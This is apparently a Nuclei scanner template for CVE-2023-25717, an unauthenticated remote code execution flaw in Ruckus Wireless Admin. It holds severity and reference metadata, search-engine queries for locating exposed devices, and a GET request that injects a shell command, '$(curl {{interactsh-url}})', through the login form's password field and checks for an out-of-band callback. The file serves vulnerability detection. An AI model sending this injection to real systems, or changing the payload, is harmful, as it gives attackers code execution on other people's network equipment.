49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2023-25717
|
|
|
|
info:
|
|
name: Ruckus Wireless Admin - Remote Code Execution
|
|
author: parthmalhotra,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
|
|
impact: |
|
|
Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
|
|
remediation: |
|
|
Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
|
|
reference:
|
|
- https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
|
|
- https://support.ruckuswireless.com/security_bulletins/315
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-25717
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-25717
|
|
cwe-id: CWE-94
|
|
epss-score: 0.95613
|
|
epss-percentile: 0.99262
|
|
cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ruckuswireless
|
|
product: ruckus_wireless_admin
|
|
shodan-query:
|
|
- title:"ruckus wireless"
|
|
- http.title:"ruckus wireless"
|
|
fofa-query: title="ruckus wireless"
|
|
google-query: intitle:"ruckus wireless"
|
|
tags: cve2023,cve,ruckus,rce,kev,ruckuswireless
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(interactsh_protocol, 'http')
|
|
- contains_all(to_lower(interactsh_request), 'user-agent','curl')
|
|
- status_code_1 == 302
|
|
condition: and
|
|
# digest: 480a00453043021f1ea263cea2eed76bac36950b39862f66ac454feafa67b6a16e30db96437f7202200627aaf451e88594be1228645a9e55817113148c8a4c460d0c3e41dacf5e1c31:922c64590222798bb761d5b6d8e72950 |